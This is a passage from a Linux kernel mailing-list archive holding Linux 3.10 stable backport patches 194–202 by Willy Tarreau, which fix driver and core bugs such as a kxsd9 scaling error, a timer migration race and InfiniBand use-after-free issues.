 		ret = spi_w8r8(st->us, KXSD9_READ(KXSD9_REG_CTRL_C));
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 194/319] iio: accel: kxsd9: Fix scaling bug
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (92 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 193/319] iio: accel: kxsd9: Fix raw read return Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 195/319] thermal: hwmon: Properly report critical temperature in sysfs Willy Tarreau
                   ` (124 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Linus Walleij, Jonathan Cameron, Willy Tarreau

From: Linus Walleij <linus.walleij@linaro.org>

commit 307fe9dd11ae44d4f8881ee449a7cbac36e1f5de upstream.

All the scaling of the KXSD9 involves multiplication with a
fraction number < 1.

However the scaling value returned from IIO_INFO_SCALE was
unpredictable as only the micros of the value was assigned, and
not the integer part, resulting in scaling like this:

$cat in_accel_scale
-1057462640.011978

Fix this by assigning zero to the integer part.

Tested-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/iio/accel/kxsd9.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/iio/accel/kxsd9.c b/drivers/iio/accel/kxsd9.c
index d94c0ca..4f9d178 100644
--- a/drivers/iio/accel/kxsd9.c
+++ b/drivers/iio/accel/kxsd9.c
@@ -166,6 +166,7 @@ static int kxsd9_read_raw(struct iio_dev *indio_dev,
 		ret = spi_w8r8(st->us, KXSD9_READ(KXSD9_REG_CTRL_C));
 		if (ret < 0)
 			goto error_ret;
+		*val = 0;
 		*val2 = kxsd9_micro_scales[ret & KXSD9_FS_MASK];
 		ret = IIO_VAL_INT_PLUS_MICRO;
 		break;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 195/319] thermal: hwmon: Properly report critical temperature in sysfs
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (93 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 194/319] iio: accel: kxsd9: Fix scaling bug Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 196/319] cdc-acm: fix wrong pipe type on rx interrupt xfers Willy Tarreau
                   ` (123 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Krzysztof Kozlowski, Zhang Rui, Willy Tarreau

From: Krzysztof Kozlowski <krzk@kernel.org>

commit f37fabb8643eaf8e3b613333a72f683770c85eca upstream.

In the critical sysfs entry the thermal hwmon was returning wrong
temperature to the user-space.  It was reporting the temperature of the
first trip point instead of the temperature of critical trip point.

For example:
	/sys/class/hwmon/hwmon0/temp1_crit:50000
	/sys/class/thermal/thermal_zone0/trip_point_0_temp:50000
	/sys/class/thermal/thermal_zone0/trip_point_0_type:active
	/sys/class/thermal/thermal_zone0/trip_point_3_temp:120000
	/sys/class/thermal/thermal_zone0/trip_point_3_type:critical

Since commit e68b16abd91d ("thermal: add hwmon sysfs I/F") the driver
have been registering a sysfs entry if get_crit_temp() callback was
provided.  However when accessed, it was calling get_trip_temp() instead
of the get_crit_temp().

Fixes: e68b16abd91d ("thermal: add hwmon sysfs I/F")
Signed-off-by: Krzysztof Kozlowski <krzk@kernel.org>
Signed-off-by: Zhang Rui <rui.zhang@intel.com>
[wt: s/thermal_hwmon.c/thermal_core.c in 3.10]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/thermal/thermal_core.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/thermal/thermal_core.c b/drivers/thermal/thermal_core.c
index d755440..f9bf597 100644
--- a/drivers/thermal/thermal_core.c
+++ b/drivers/thermal/thermal_core.c
@@ -924,7 +924,7 @@ temp_crit_show(struct device *dev, struct device_attribute *attr,
 	long temperature;
 	int ret;
 
-	ret = tz->ops->get_trip_temp(tz, 0, &temperature);
+	ret = tz->ops->get_crit_temp(tz, &temperature);
 	if (ret)
 		return ret;
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 196/319] cdc-acm: fix wrong pipe type on rx interrupt xfers
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (94 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 195/319] thermal: hwmon: Properly report critical temperature in sysfs Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 197/319] timers: Use proper base migration in add_timer_on() Willy Tarreau
                   ` (122 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Gavin Li, Greg Kroah-Hartman, Willy Tarreau

From: Gavin Li <git@thegavinli.com>

commit add125054b8727103631dce116361668436ef6a7 upstream.

This fixes the "BOGUS urb xfer" warning logged by usb_submit_urb().

Signed-off-by: Gavin Li <git@thegavinli.com>
Acked-by: Oliver Neukum <oneukum@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/class/cdc-acm.c | 5 ++---
 drivers/usb/class/cdc-acm.h | 1 -
 2 files changed, 2 insertions(+), 4 deletions(-)

diff --git a/drivers/usb/class/cdc-acm.c b/drivers/usb/class/cdc-acm.c
index e7436eb..b364845 100644
--- a/drivers/usb/class/cdc-acm.c
+++ b/drivers/usb/class/cdc-acm.c
@@ -1213,7 +1213,6 @@ made_compressed_probe:
 	spin_lock_init(&acm->write_lock);
 	spin_lock_init(&acm->read_lock);
 	mutex_init(&acm->mutex);
-	acm->rx_endpoint = usb_rcvbulkpipe(usb_dev, epread->bEndpointAddress);
 	acm->is_int_ep = usb_endpoint_xfer_int(epread);
 	if (acm->is_int_ep)
 		acm->bInterval = epread->bInterval;
@@ -1262,14 +1261,14 @@ made_compressed_probe:
 		urb->transfer_dma = rb->dma;
 		if (acm->is_int_ep) {
 			usb_fill_int_urb(urb, acm->dev,
-					 acm->rx_endpoint,
+					 usb_rcvintpipe(usb_dev, epread->bEndpointAddress),
 					 rb->base,
 					 acm->readsize,
 					 acm_read_bulk_callback, rb,
 					 acm->bInterval);
 		} else {
 			usb_fill_bulk_urb(urb, acm->dev,
-					  acm->rx_endpoint,
+					  usb_rcvbulkpipe(usb_dev, epread->bEndpointAddress),
 					  rb->base,
 					  acm->readsize,
 					  acm_read_bulk_callback, rb);
diff --git a/drivers/usb/class/cdc-acm.h b/drivers/usb/class/cdc-acm.h
index 1683ac1..bf4e1bb 100644
--- a/drivers/usb/class/cdc-acm.h
+++ b/drivers/usb/class/cdc-acm.h
@@ -95,7 +95,6 @@ struct acm {
 	struct urb *read_urbs[ACM_NR];
 	struct acm_rb read_buffers[ACM_NR];
 	int rx_buflimit;
-	int rx_endpoint;
 	spinlock_t read_lock;
 	int write_used;					/* number of non-empty write buffers */
 	int transmitting;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 197/319] timers: Use proper base migration in add_timer_on()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (95 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 196/319] cdc-acm: fix wrong pipe type on rx interrupt xfers Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 198/319] EDAC: Increment correct counter in edac_inc_ue_error() Willy Tarreau
                   ` (121 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Tejun Heo, Chris Worley, bfields, Michael Skralivetsky,
	Trond Myklebust, Shaohua Li, Jeff Layton, kernel-team,
	Thomas Gleixner, Mike Galbraith, Willy Tarreau

From: Tejun Heo <tj@kernel.org>

commit 22b886dd1018093920c4250dee2a9a3cb7cff7b8 upstream.

Regardless of the previous CPU a timer was on, add_timer_on()
currently simply sets timer->flags to the new CPU.  As the caller must
be seeing the timer as idle, this is locally fine, but the timer
leaving the old base while unlocked can lead to race conditions as
follows.

Let's say timer was on cpu 0.

  cpu 0					cpu 1
  -----------------------------------------------------------------------------
  del_timer(timer) succeeds
					del_timer(timer)
					  lock_timer_base(timer) locks cpu_0_base
  add_timer_on(timer, 1)
    spin_lock(&cpu_1_base->lock)
    timer->flags set to cpu_1_base
    operates on @timer			  operates on @timer

This triggered with mod_delayed_work_on() which contains
"if (del_timer()) add_timer_on()" sequence eventually leading to the
following oops.

  BUG: unable to handle kernel NULL pointer dereference at           (null)
  IP: [<ffffffff810ca6e9>] detach_if_pending+0x69/0x1a0
  ...
  Workqueue: wqthrash wqthrash_workfunc [wqthrash]
  task: ffff8800172ca680 ti: ffff8800172d0000 task.ti: ffff8800172d0000
  RIP: 0010:[<ffffffff810ca6e9>]  [<ffffffff810ca6e9>] detach_if_pending+0x69/0x1a0
  ...
  Call Trace:
   [<ffffffff810cb0b4>] del_timer+0x44/0x60
   [<ffffffff8106e836>] try_to_grab_pending+0xb6/0x160
   [<ffffffff8106e913>] mod_delayed_work_on+0x33/0x80
   [<ffffffffa0000081>] wqthrash_workfunc+0x61/0x90 [wqthrash]
   [<ffffffff8106dba8>] process_one_work+0x1e8/0x650
   [<ffffffff8106e05e>] worker_thread+0x4e/0x450
   [<ffffffff810746af>] kthread+0xef/0x110
   [<ffffffff8185980f>] ret_from_fork+0x3f/0x70

Fix it by updating add_timer_on() to perform proper migration as
__mod_timer() does.

Mike: apply tglx backport

Reported-and-tested-by: Jeff Layton <jlayton@poochiereds.net>
Signed-off-by: Tejun Heo <tj@kernel.org>
Cc: Chris Worley <chris.worley@primarydata.com>
Cc: bfields@fieldses.org
Cc: Michael Skralivetsky <michael.skralivetsky@primarydata.com>
Cc: Trond Myklebust <trond.myklebust@primarydata.com>
Cc: Shaohua Li <shli@fb.com>
Cc: Jeff Layton <jlayton@poochiereds.net>
Cc: kernel-team@fb.com
Cc: stable@vger.kernel.org
Link: http://lkml.kernel.org/r/20151029103113.2f893924@tlielax.poochiereds.net
Link: http://lkml.kernel.org/r/20151104171533.GI5749@mtj.duckdns.org
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Mike Galbraith <mgalbraith@suse.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 kernel/timer.c | 19 ++++++++++++++++---
 1 file changed, 16 insertions(+), 3 deletions(-)

diff --git a/kernel/timer.c b/kernel/timer.c
index 20f45ea..be22e45 100644
--- a/kernel/timer.c
+++ b/kernel/timer.c
@@ -923,13 +923,26 @@ EXPORT_SYMBOL(add_timer);
  */
 void add_timer_on(struct timer_list *timer, int cpu)
 {
-	struct tvec_base *base = per_cpu(tvec_bases, cpu);
+	struct tvec_base *new_base = per_cpu(tvec_bases, cpu);
+	struct tvec_base *base;
 	unsigned long flags;
 
 	timer_stats_timer_set_start_info(timer);
 	BUG_ON(timer_pending(timer) || !timer->function);
-	spin_lock_irqsave(&base->lock, flags);
-	timer_set_base(timer, base);
+
+	/*
+	 * If @timer was on a different CPU, it should be migrated with the
+	 * old base locked to prevent other operations proceeding with the
+	 * wrong base locked.  See lock_timer_base().
+	 */
+	base = lock_timer_base(timer, &flags);
+	if (base != new_base) {
+		timer_set_base(timer, NULL);
+		spin_unlock(&base->lock);
+		base = new_base;
+		spin_lock(&base->lock);
+		timer_set_base(timer, base);
+	}
 	debug_activate(timer, timer->expires);
 	internal_add_timer(base, timer);
 	/*
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 198/319] EDAC: Increment correct counter in edac_inc_ue_error()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (96 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 197/319] timers: Use proper base migration in add_timer_on() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 199/319] IB/srpt: Simplify srpt_handle_tsk_mgmt() Willy Tarreau
                   ` (120 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Emmanouil Maroudas, Mauro Carvalho Chehab, linux-edac,
	Borislav Petkov, Willy Tarreau

From: Emmanouil Maroudas <emmanouil.maroudas@gmail.com>

commit 993f88f1cc7f0879047ff353e824e5cc8f10adfc upstream.

Fix typo in edac_inc_ue_error() to increment ue_noinfo_count instead of
ce_noinfo_count.

Signed-off-by: Emmanouil Maroudas <emmanouil.maroudas@gmail.com>
Cc: Mauro Carvalho Chehab <mchehab@osg.samsung.com>
Cc: linux-edac <linux-edac@vger.kernel.org>
Fixes: 4275be635597 ("edac: Change internal representation to work with layers")
Link: http://lkml.kernel.org/r/1461425580-5898-1-git-send-email-emmanouil.maroudas@gmail.com
Signed-off-by: Borislav Petkov <bp@suse.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/edac/edac_mc.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/edac/edac_mc.c b/drivers/edac/edac_mc.c
index a9d98cd..9e15fc8 100644
--- a/drivers/edac/edac_mc.c
+++ b/drivers/edac/edac_mc.c
@@ -968,7 +968,7 @@ static void edac_inc_ue_error(struct mem_ctl_info *mci,
 	mci->ue_mc += count;
 
 	if (!enable_per_layer_report) {
-		mci->ce_noinfo_count += count;
+		mci->ue_noinfo_count += count;
 		return;
 	}
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 199/319] IB/srpt: Simplify srpt_handle_tsk_mgmt()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (97 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 198/319] EDAC: Increment correct counter in edac_inc_ue_error() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-06  5:14   ` Bart Van Assche
  2017-02-05 19:20 ` [PATCH 3.10 200/319] IB/ipoib: Fix memory corruption in ipoib cm mode connect flow Willy Tarreau
                   ` (119 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Bart Van Assche, Nicholas Bellinger, Sagi Grimberg, Doug Ledford,
	Willy Tarreau

From: Bart Van Assche <bart.vanassche@sandisk.com>

commit 51093254bf879bc9ce96590400a87897c7498463 upstream.

Let the target core check task existence instead of the SRP target
driver. Additionally, let the target core check the validity of the
task management request instead of the ib_srpt driver.

This patch fixes the following kernel crash:

BUG: unable to handle kernel NULL pointer dereference at 0000000000000001
IP: [<ffffffffa0565f37>] srpt_handle_new_iu+0x6d7/0x790 [ib_srpt]
Oops: 0002 [#1] SMP
Call Trace:
 [<ffffffffa05660ce>] srpt_process_completion+0xde/0x570 [ib_srpt]
 [<ffffffffa056669f>] srpt_compl_thread+0x13f/0x160 [ib_srpt]
 [<ffffffff8109726f>] kthread+0xcf/0xe0
 [<ffffffff81613cfc>] ret_from_fork+0x7c/0xb0

Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Fixes: 3e4f574857ee ("ib_srpt: Convert TMR path to target_submit_tmr")
Tested-by: Alex Estrin <alex.estrin@intel.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Cc: Nicholas Bellinger <nab@linux-iscsi.org>
Cc: Sagi Grimberg <sagig@mellanox.com>
Cc: stable <stable@vger.kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/infiniband/ulp/srpt/ib_srpt.c | 59 +----------------------------------
 1 file changed, 1 insertion(+), 58 deletions(-)

diff --git a/drivers/infiniband/ulp/srpt/ib_srpt.c b/drivers/infiniband/ulp/srpt/ib_srpt.c
index fcf9f87..1e79114 100644
--- a/drivers/infiniband/ulp/srpt/ib_srpt.c
+++ b/drivers/infiniband/ulp/srpt/ib_srpt.c
@@ -1754,47 +1754,6 @@ send_sense:
 	return -1;
 }
 
-/**
- * srpt_rx_mgmt_fn_tag() - Process a task management function by tag.
- * @ch: RDMA channel of the task management request.
- * @fn: Task management function to perform.
- * @req_tag: Tag of the SRP task management request.
- * @mgmt_ioctx: I/O context of the task management request.
- *
- * Returns zero if the target core will process the task management
- * request asynchronously.
- *
- * Note: It is assumed that the initiator serializes tag-based task management
- * requests.
- */
-static int srpt_rx_mgmt_fn_tag(struct srpt_send_ioctx *ioctx, u64 tag)
-{
-	struct srpt_device *sdev;
-	struct srpt_rdma_ch *ch;
-	struct srpt_send_ioctx *target;
-	int ret, i;
-
-	ret = -EINVAL;
-	ch = ioctx->ch;
-	BUG_ON(!ch);
-	BUG_ON(!ch->sport);
-	sdev = ch->sport->sdev;
-	BUG_ON(!sdev);
-	spin_lock_irq(&sdev->spinlock);
-	for (i = 0; i < ch->rq_size; ++i) {
-		target = ch->ioctx_ring[i];
-		if (target->cmd.se_lun == ioctx->cmd.se_lun &&
-		    target->tag == tag &&
-		    srpt_get_cmd_state(target) != SRPT_STATE_DONE) {
-			ret = 0;
-			/* now let the target core abort &target->cmd; */
-			break;
-		}
-	}
-	spin_unlock_irq(&sdev->spinlock);
-	return ret;
-}
-
 static int srp_tmr_to_tcm(int fn)
 {
 	switch (fn) {
@@ -1829,7 +1788,6 @@ static void srpt_handle_tsk_mgmt(struct srpt_rdma_ch *ch,
 	struct se_cmd *cmd;
 	struct se_session *sess = ch->sess;
 	uint64_t unpacked_lun;
-	uint32_t tag = 0;
 	int tcm_tmr;
 	int rc;
 
@@ -1845,25 +1803,10 @@ static void srpt_handle_tsk_mgmt(struct srpt_rdma_ch *ch,
 	srpt_set_cmd_state(send_ioctx, SRPT_STATE_MGMT);
 	send_ioctx->tag = srp_tsk->tag;
 	tcm_tmr = srp_tmr_to_tcm(srp_tsk->tsk_mgmt_func);
-	if (tcm_tmr < 0) {
-		send_ioctx->cmd.se_tmr_req->response =
-			TMR_TASK_MGMT_FUNCTION_NOT_SUPPORTED;
-		goto fail;
-	}
 	unpacked_lun = srpt_unpack_lun((uint8_t *)&srp_tsk->lun,
 				       sizeof(srp_tsk->lun));
-
-	if (srp_tsk->tsk_mgmt_func == SRP_TSK_ABORT_TASK) {
-		rc = srpt_rx_mgmt_fn_tag(send_ioctx, srp_tsk->task_tag);
-		if (rc < 0) {
-			send_ioctx->cmd.se_tmr_req->response =
-					TMR_TASK_DOES_NOT_EXIST;
-			goto fail;
-		}
-		tag = srp_tsk->task_tag;
-	}
 	rc = target_submit_tmr(&send_ioctx->cmd, sess, NULL, unpacked_lun,
-				srp_tsk, tcm_tmr, GFP_KERNEL, tag,
+				srp_tsk, tcm_tmr, GFP_KERNEL, srp_tsk->task_tag,
 				TARGET_SCF_ACK_KREF);
 	if (rc != 0) {
 		send_ioctx->cmd.se_tmr_req->response = TMR_FUNCTION_REJECTED;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 200/319] IB/ipoib: Fix memory corruption in ipoib cm mode connect flow
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (98 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 199/319] IB/srpt: Simplify srpt_handle_tsk_mgmt() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 201/319] IB/core: Fix use after free in send_leave function Willy Tarreau
                   ` (118 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Erez Shitrit, Leon Romanovsky, Doug Ledford, Willy Tarreau

From: Erez Shitrit <erezsh@mellanox.com>

commit 546481c2816ea3c061ee9d5658eb48070f69212e upstream.

When a new CM connection is being requested, ipoib driver copies data
from the path pointer in the CM/tx object, the path object might be
invalid at the point and memory corruption will happened later when now
the CM driver will try using that data.

The next scenario demonstrates it:
	neigh_add_path --> ipoib_cm_create_tx -->
	queue_work (pointer to path is in the cm/tx struct)
	#while the work is still in the queue,
	#the port goes down and causes the ipoib_flush_paths:
	ipoib_flush_paths --> path_free --> kfree(path)
	#at this point the work scheduled starts.
	ipoib_cm_tx_start --> copy from the (invalid)path pointer:
	(memcpy(&pathrec, &p->path->pathrec, sizeof pathrec);)
	 -> memory corruption.

To fix that the driver now starts the CM/tx connection only if that
specific path exists in the general paths database.
This check is protected with the relevant locks, and uses the gid from
the neigh member in the CM/tx object which is valid according to the ref
count that was taken by the CM/tx.

Fixes: 839fcaba35 ('IPoIB: Connected mode experimental support')
Signed-off-by: Erez Shitrit <erezsh@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/infiniband/ulp/ipoib/ipoib.h      |  1 +
 drivers/infiniband/ulp/ipoib/ipoib_cm.c   | 16 ++++++++++++++++
 drivers/infiniband/ulp/ipoib/ipoib_main.c |  2 +-
 3 files changed, 18 insertions(+), 1 deletion(-)

diff --git a/drivers/infiniband/ulp/ipoib/ipoib.h b/drivers/infiniband/ulp/ipoib/ipoib.h
index eb71aaa..fb9a7b3 100644
--- a/drivers/infiniband/ulp/ipoib/ipoib.h
+++ b/drivers/infiniband/ulp/ipoib/ipoib.h
@@ -460,6 +460,7 @@ void ipoib_send(struct net_device *dev, struct sk_buff *skb,
 		struct ipoib_ah *address, u32 qpn);
 void ipoib_reap_ah(struct work_struct *work);
 
+struct ipoib_path *__path_find(struct net_device *dev, void *gid);
 void ipoib_mark_paths_invalid(struct net_device *dev);
 void ipoib_flush_paths(struct net_device *dev);
 struct ipoib_dev_priv *ipoib_intf_alloc(const char *format);
diff --git a/drivers/infiniband/ulp/ipoib/ipoib_cm.c b/drivers/infiniband/ulp/ipoib/ipoib_cm.c
index 3eceb61..aa9ad2d 100644
--- a/drivers/infiniband/ulp/ipoib/ipoib_cm.c
+++ b/drivers/infiniband/ulp/ipoib/ipoib_cm.c
@@ -1290,6 +1290,8 @@ void ipoib_cm_destroy_tx(struct ipoib_cm_tx *tx)
 	}
 }
 
+#define QPN_AND_OPTIONS_OFFSET	4
+
 static void ipoib_cm_tx_start(struct work_struct *work)
 {
 	struct ipoib_dev_priv *priv = container_of(work, struct ipoib_dev_priv,
@@ -1298,6 +1300,7 @@ static void ipoib_cm_tx_start(struct work_struct *work)
 	struct ipoib_neigh *neigh;
 	struct ipoib_cm_tx *p;
 	unsigned long flags;
+	struct ipoib_path *path;
 	int ret;
 
 	struct ib_sa_path_rec pathrec;
@@ -1310,7 +1313,19 @@ static void ipoib_cm_tx_start(struct work_struct *work)
 		p = list_entry(priv->cm.start_list.next, typeof(*p), list);
 		list_del_init(&p->list);
 		neigh = p->neigh;
+
 		qpn = IPOIB_QPN(neigh->daddr);
+		/*
+		 * As long as the search is with these 2 locks,
+		 * path existence indicates its validity.
+		 */
+		path = __path_find(dev, neigh->daddr + QPN_AND_OPTIONS_OFFSET);
+		if (!path) {
+			pr_info("%s ignore not valid path %pI6\n",
+				__func__,
+				neigh->daddr + QPN_AND_OPTIONS_OFFSET);
+			goto free_neigh;
+		}
 		memcpy(&pathrec, &p->path->pathrec, sizeof pathrec);
 
 		spin_unlock_irqrestore(&priv->lock, flags);
@@ -1322,6 +1337,7 @@ static void ipoib_cm_tx_start(struct work_struct *work)
 		spin_lock_irqsave(&priv->lock, flags);
 
 		if (ret) {
+free_neigh:
 			neigh = p->neigh;
 			if (neigh) {
 				neigh->cm = NULL;
diff --git a/drivers/infiniband/ulp/ipoib/ipoib_main.c b/drivers/infiniband/ulp/ipoib/ipoib_main.c
index a481094..375f9ed 100644
--- a/drivers/infiniband/ulp/ipoib/ipoib_main.c
+++ b/drivers/infiniband/ulp/ipoib/ipoib_main.c
@@ -251,7 +251,7 @@ int ipoib_set_mode(struct net_device *dev, const char *buf)
 	return -EINVAL;
 }
 
-static struct ipoib_path *__path_find(struct net_device *dev, void *gid)
+struct ipoib_path *__path_find(struct net_device *dev, void *gid)
 {
 	struct ipoib_dev_priv *priv = netdev_priv(dev);
 	struct rb_node *n = priv->path_tree.rb_node;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 201/319] IB/core: Fix use after free in send_leave function
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (99 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 200/319] IB/ipoib: Fix memory corruption in ipoib cm mode connect flow Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 202/319] IB/ipoib: Don't allow MC joins during light MC flush Willy Tarreau
                   ` (117 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Erez Shitrit, Leon Romanovsky, Doug Ledford, Willy Tarreau

From: Erez Shitrit <erezsh@mellanox.com>

commit 68c6bcdd8bd00394c234b915ab9b97c74104130c upstream.

The function send_leave sets the member: group->query_id
(group->query_id = ret) after calling the sa_query, but leave_handler
can be executed before the setting and it might delete the group object,
and will get a memory corruption.

Additionally, this patch gets rid of group->query_id variable which is
not used.

Fixes: faec2f7b96b5 ('IB/sa: Track multicast join/leave requests')
Signed-off-by: Erez Shitrit <erezsh@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/infiniband/core/multicast.c | 13 ++-----------
 1 file changed, 2 insertions(+), 11 deletions(-)

diff --git a/drivers/infiniband/core/multicast.c b/drivers/infiniband/core/multicast.c
index d2360a8..180d7f4 100644
--- a/drivers/infiniband/core/multicast.c
+++ b/drivers/infiniband/core/multicast.c
@@ -106,7 +106,6 @@ struct mcast_group {
 	atomic_t		refcount;
 	enum mcast_group_state	state;
 	struct ib_sa_query	*query;
-	int			query_id;
 	u16			pkey_index;
 	u8			leave_state;
 	int			retries;
@@ -339,11 +338,7 @@ static int send_join(struct mcast_group *group, struct mcast_member *member)
 				       member->multicast.comp_mask,
 				       3000, GFP_KERNEL, join_handler, group,
 				       &group->query);
-	if (ret >= 0) {
-		group->query_id = ret;
-		ret = 0;
-	}
-	return ret;
+	return (ret > 0) ? 0 : ret;
 }
 
 static int send_leave(struct mcast_group *group, u8 leave_state)
@@ -363,11 +358,7 @@ static int send_leave(struct mcast_group *group, u8 leave_state)
 				       IB_SA_MCMEMBER_REC_JOIN_STATE,
 				       3000, GFP_KERNEL, leave_handler,
 				       group, &group->query);
-	if (ret >= 0) {
-		group->query_id = ret;
-		ret = 0;
-	}
-	return ret;
+	return (ret > 0) ? 0 : ret;
 }
 
 static void join_group(struct mcast_group *group, struct mcast_member *member,
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 202/319] IB/ipoib: Don't allow MC joins during light MC flush
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (100 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 201/319] IB/core: Fix use after free in send_leave function Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 203/319] IB/mlx4: Fix incorrect MC join state bit-masking on SR-IOV Willy Tarreau
                   ` (116 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Alex Vesker, Leon Romanovsky, Doug Ledford, Willy Tarreau

From: Alex Vesker <valex@mellanox.com>

commit 344bacca8cd811809fc33a249f2738ab757d327f upstream.

This fix solves a race between light flush and on the fly joins.
Light flush doesn't set the device to down and unset IPOIB_OPER_UP
flag, this means that if while flushing we have a MC join in progress
and the QP was attached to BC MGID we can have a mismatches when
re-attaching a QP to the BC MGID.

The light flush would set the broadcast group to NULL causing an on
the fly join to rejoin and reattach to the BC MCG as well as adding
the BC MGID to the multicast list. The flush process would later on
remove the BC MGID and detach it from the QP. On the next flush
